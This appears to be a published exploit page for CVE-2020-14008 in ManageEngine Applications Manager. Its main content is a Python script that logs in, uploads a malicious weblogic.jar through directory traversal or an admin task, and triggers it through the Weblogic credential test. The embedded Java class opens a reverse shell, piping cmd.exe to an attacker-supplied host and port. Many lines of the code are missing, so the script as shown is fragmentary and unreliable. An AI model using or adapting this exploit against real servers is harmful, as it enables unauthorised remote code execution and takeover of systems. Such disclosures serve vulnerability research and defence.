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ManageEngine Applications Manager Authenticated Remote Code Execution

ManageEngine Applications Manager Authenticated Remote Code Execution
Posted Sep 4, 2020
Authored by Hodorsec

ManageEngine Applications Manager authenticated remote code execution exploit that leverages the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor. Versions below 14720 are affected.

tags | exploit, remote, code execution
advisories | CVE-2020-14008
SHA-256 | 0c0cd9e0020b9b9ebc100236161c5168965c12c7c555ee30775d0cba210c80f1

ManageEngine Applications Manager Authenticated Remote Code Execution

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# Exploit Title: ManageEngine Applications Manager - Authenticated RCE via Java class reflection in Weblogic server test credential API
# Google Dork: None
# Date: 04-09-2020
# Exploit Author: Hodorsec
# Vendor Homepage: https://manageengine.co.uk
# Vendor Vulnerability Description: https://manageengine.co.uk/products/applications_manager/security-updates/security-updates-cve-2020-14008.html
# Software Link: http://archives.manageengine.com/applications_manager/14720/
# Version: Until version 14720
# Tested on: version 12900 and version 14700
# CVE : CVE-2020-14008

# Summary:
# POC for proving ability to execute malicious Java code in uploaded JAR file as an Oracle Weblogic library to connect to Weblogic servers
# Exploits the newInstance() and loadClass() methods being used by the "WeblogicReference", when attempting a Credential Test for a new Monitor
# When invoking the Credential Test, a call is being made to lookup a possibly existing "weblogic.jar" JAR file, using the "weblogic.jndi.Environment" class and method

# Vulnerable code:
# Lines 129 - 207 in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
# 129 /* */ public static MBeanServer lookupMBeanServer(String hostname, String portString, String username, String password, int version) throws Exception {
# 130 /* 130 */ ClassLoader current = Thread.currentThread().getContextClassLoader();
# 131 /* */ try {
# 132 /* 132 */ boolean setcredentials = false;
# 133 /* 133 */ String url = "t3://" + hostname + ":" + portString;
# 134 /* 134 */ JarLoader jarLoader = null;
# 135 /* */
# ....<SNIP>....
# 143 /* */ }
# 144 /* 144 */ else if (version == 8)
# 145 /* */ {
# 146 /* 146 */ if (new File("./../working/classes/weblogic/version8/weblogic.jar").exists())
# 147 /* */ {
# 148 /* */
# 149 /* 149 */ jarLoader = new JarLoader("." + File.separator + ".." + File.separator + "working" + File.separator + "classes" + File.separator + "weblogic" + File.separator + "version8" + File.separator + "weblogic.jar");
# 150 /* */
# ....<SNIP>....
# 170 /* 170 */ Thread.currentThread().setContextClassLoader(jarLoader);
# 171 /* 171 */ Class cls = jarLoader.loadClass("weblogic.jndi.Environment");
# 172 /* 172 */ Object env = cls.newInstance();

# Example call for MAM version 12900:
# $ python3 poc_mam_weblogic_upload_and_exec_jar.py admin admin weblogic.jar
# [*] Visiting page to retrieve initial cookies...
# [*] Retrieving admin cookie...
# [*] Getting base directory of ManageEngine...
# [*] Found base directory: C:\Program Files (x86)\ManageEngine\AppManager12
# [*] Creating JAR file...
# Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
# Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
# added manifest
# adding: weblogic/jndi/Environment.class(in = 1844) (out= 1079)(deflated 41%)
# [*] Uploading JAR file...
# [*] Attempting to upload JAR directly to targeted Weblogic folder...
# [*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!
# [*] Running the Weblogic credentialtest which triggers the code in the JAR...
# [*] Check your shell...

# Function flow:
# 1. Get initial cookie
# 2. Get valid session cookie by logging in
# 3. Get base directory of installation
# 4. Generate a malicious JAR file
# 5. Attempt to directly upload JAR, if success, jump to 7
# 6. Create task with random ID to copy JAR file to expected Weblogic location
# 7. Execute task
# 8. Delete task for cleanup
# 9. Run the vulnerable credentialTest, using the malicious JAR

import requests
import urllib3
import shutil
import subprocess
import os
import sys
import random
import re
from lxml import html

# Optionally, use a proxy
# proxy = "http://<user>:<pass>@<proxy>:<port>"
proxy = ""
os.environ['http_proxy'] = proxy
os.environ['HTTP_PROXY'] = proxy
os.environ['https_proxy'] = proxy
os.environ['HTTPS_PROXY'] = proxy

# Disable cert warnings

# Set timeout
timeout = 10

# Handle CTRL-C
def keyboard_interrupt():
"""Handles keyboardinterrupt exceptions"""
print("\n\n[*] User requested an interrupt, exiting...")

# Custom headers
def http_headers():
headers = {
'User-Agent': 'Mozilla',
return headers

def get_initial_cookie(url,headers):
print("[*] Visiting page to retrieve initial cookies...")
target = url + "/index.do"
r = requests.get(target,headers=headers,timeout=timeout,verify=False)
return r.cookies

def get_valid_cookie(url,headers,initial_cookies,usern,passw):
print("[*] Retrieving admin cookie...")
appl_cookie = "JSESSIONID_APM_9090"
post_data = {'clienttype':'html',
target = url + "/j_security_check"
r = requests.post(target,data=post_data,headers=headers,cookies=initial_cookies,timeout=timeout,verify=False)
res = r.text
if "Server responded in " in res:
return r.cookies
print("[!] No valid response from used session, exiting!\n")

def get_base_dir(url,headers,valid_cookie):
print("[*] Getting base directory of ManageEngine...")
target = url + "/common/serverinfo.do"
params = {'service':'AppManager',
r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
tree = html.fromstring(r.content)
pathname = tree.xpath('//table[@class="lrbtborder"]/tr[6]/td[2]/@title')
base_dir = pathname[0]
print("[*] Found base directory: " + base_dir)
return base_dir

def create_jar(command,jarname,revhost,revport):
print("[*] Creating JAR file...")
# Variables
classname = "Environment"
pkgname = "weblogic.jndi"
fullname = pkgname + "." + classname
manifest = "MANIFEST.MF"

# Directory variables
curdir = os.getcwd()
metainf_dir = "META-INF"
maindir = "weblogic"
subdir = maindir + "/jndi"
builddir = curdir + "/" + subdir

# Check if directory exist, else create directory
if os.path.isdir(builddir):
except OSError:
print("[!] Error creating local directory \"" + builddir + "\", check permissions...")

# Creating the text file using given parameters
javafile = '''package ''' + pkgname + ''';

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
import java.util.concurrent.TimeUnit;

public class ''' + classname + ''' {

// This method is being called by lookupMBeanServer() in com/adventnet/appmanager/server/wlogic/statuspoll/WeblogicReference.java
// Uses the jarLoader.loadClass() method to load and initiate a new instance via newInstance()
public void setProviderUrl(String string) throws Exception {
System.out.println("Hello from setProviderUrl()");

// Normal main() entry
public static void main(String args[]) throws Exception {
System.out.println("Hello from main()");
// Added delay to notice being called from main()

// Where the magic happens
public static void connect() throws Exception {
String host = "''' + revhost + '''";
int port = ''' + str(revport) + ''';
String[] cmd = {"''' + command + '''"};

Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()) {

try {
catch (Exception e){



# Output file to desired directory
print(javafile,file=open(classname + ".java","w"))

# Go to previous directory to create JAR file

# Create the compiled .class file
cmdCompile = "javac --release 7 " + subdir + "/*.java"
process = subprocess.call(cmdCompile,shell=True)

# Creating Manifest file
if os.path.isdir(metainf_dir):
except OSError:
print("[!] Error creating local directory \"" + metainf_dir + "\", check permissions...")
print("Main-Class: " + fullname,file=open(metainf_dir + "/" + manifest,"w"))

# Create JAR file
cmdJar = "jar cmvf " + metainf_dir + "/" + manifest + " " + jarname + " " + subdir + "/*.class"
process = subprocess.call(cmdJar,shell=True)

# Cleanup directories
print("[!] Error while cleaning up directories.")
return True

def upload_jar(url,headers,valid_cookie,jarname,rel_path):
print("[*] Uploading JAR file...")
target = url + "/Upload.do"
path_normal = './'
path_trav = rel_path
jar = {'theFile':(jarname,open(jarname, 'rb'))}
print("[*] Attempting to upload JAR directly to targeted Weblogic folder...")
post_data = {'uploadDir':path_trav}
r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
res = r_upload.text
if "successfully uploaded" not in res:
print("[!] Failed to upload JAR directly, continue to add and execute job to move JAR...")
post_data = {'uploadDir':path_normal}
jar = {'theFile':(jarname,open(jarname, 'rb'))}
r_upload = requests.post(target, data=post_data, headers=headers, files=jar, cookies=valid_cookie, timeout=timeout,verify=False)
return "normal_path"
print("[*] Copied successfully via Directory Traversal, jumping directly to call vulnerable function!")
return "trav_path"

def create_task(url,headers,valid_cookie,action_name,rel_path,work_dir):
print("[*] Creating a task to move the JAR file to relative path: " + rel_path + "...")
valid_resp = "Execute Program succesfully created."
target = url + "/adminAction.do"
post_data = {'actions':'/adminAction.do?method=showExecProgAction&haid=null',
'command':'move weblogic.jar ' + rel_path,
r = requests.post(target,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
res = r.text
found_id = ""
if action_name in res:
tree = html.fromstring(r.content)
actionurls = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/@onclick')
actionnames = tree.xpath('//table[@id="executeProgramActionTable"]/tr[@class="actionsheader"]/td[2]/a/text()')

i = 0
for name in actionnames:
for url in actionurls:
if action_name in name:
found_id = re.search(".*actionid=(.+?)','", actionurls[i]).group(1)
print("[*] Found actionname: " + action_name + " with found actionid " + found_id)
return found_id
print("[!] Actionname not found. Task probably wasn't created, please check. Exiting.")

def exec_task(url,headers,valid_cookie,found_id):
print("[*] Executing created task with id: " + found_id + " to copy JAR...")
valid_resp = "has been successfully executed"
target = url + "/common/executeScript.do"
params = {'method':'testAction',
r = requests.get(target,params=params,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)
res = r.text
if valid_resp in res:
print("[*] Task " + found_id + " has been executed successfully")
print("[!] Task not executed. Check requests, exiting...")

def del_task(url,headers,valid_cookie,found_id):
print("[*] Deleting created task as JAR has been copied...")
target = url + "/adminAction.do"
params = {'method':'deleteProgExecAction'}
post_data = {'haid':'null',
r = requests.post(target,params=params,data=post_data,headers=headers,cookies=valid_cookie,timeout=timeout,verify=False)

def run_credtest(url,headers,valid_cookie):
print("[*] Running the Weblogic credentialtest which triggers the code in the JAR...")
target = url + "/testCredential.do"
post_data = {'method':'testCredentialForConfMonitors',

print("[*] Check your shell...")

# Main
def main(argv):
if len(sys.argv) == 6:
url = sys.argv[1]
usern = sys.argv[2]
passw = sys.argv[3]
revhost = sys.argv[4]
revport = sys.argv[5]
print("[*] Usage: " + sys.argv[0] + " <url> <username> <password> <reverse_shell_host> <reverse_shell_port>")
print("[*] Example: " + sys.argv[0] + " admin admin 6666\n")

# Do stuff
# Set HTTP headers
headers = http_headers()

# Relative path to copy the malicious JAR file
rel_path = "classes/weblogic/version8/"
# Generate a random ID to use for the task name and task tracking
random_id = str(random.randrange(0000,9999))
# Action_name used for displaying actions in overview
action_name = "move_weblogic_jar" + random_id
# Working dir to append to base dir
base_append = "\\working\\"
# Name for JAR file to use
jarname = "weblogic.jar"
# Command shell to use
cmd = "cmd.exe"

# Execute functions
initial_cookies = get_initial_cookie(url,headers)
valid_cookie = get_valid_cookie(url,headers,initial_cookies,usern,passw)
work_dir = get_base_dir(url,headers,valid_cookie) + base_append
status_jar = upload_jar(url,headers,valid_cookie,jarname,rel_path)

# Check if JAR can be uploaded via Directory Traversal
# If so, no need to add and exec actions; just run the credentialtest directly
if status_jar == "trav_path":
# Cannot be uploaded via Directory Traversal, add and exec actions to move JAR. Lastly, run the vulnerable credentialtest
elif status_jar == "normal_path":
found_id = create_task(url,headers,valid_cookie,action_name,rel_path,work_dir)

except requests.exceptions.Timeout:
print("[!] Timeout error\n")
except requests.exceptions.TooManyRedirects:
print("[!] Too many redirects\n")
except requests.exceptions.ConnectionError:
print("[!] Not able to connect to URL\n")
except requests.exceptions.RequestException as e:
print("[!] " + e)
except requests.exceptions.HTTPError as e:
print("[!] Failed with error code - " + e.code + "\n")
except KeyboardInterrupt:

# If we were called as a program, go execute the main function.
if __name__ == "__main__":

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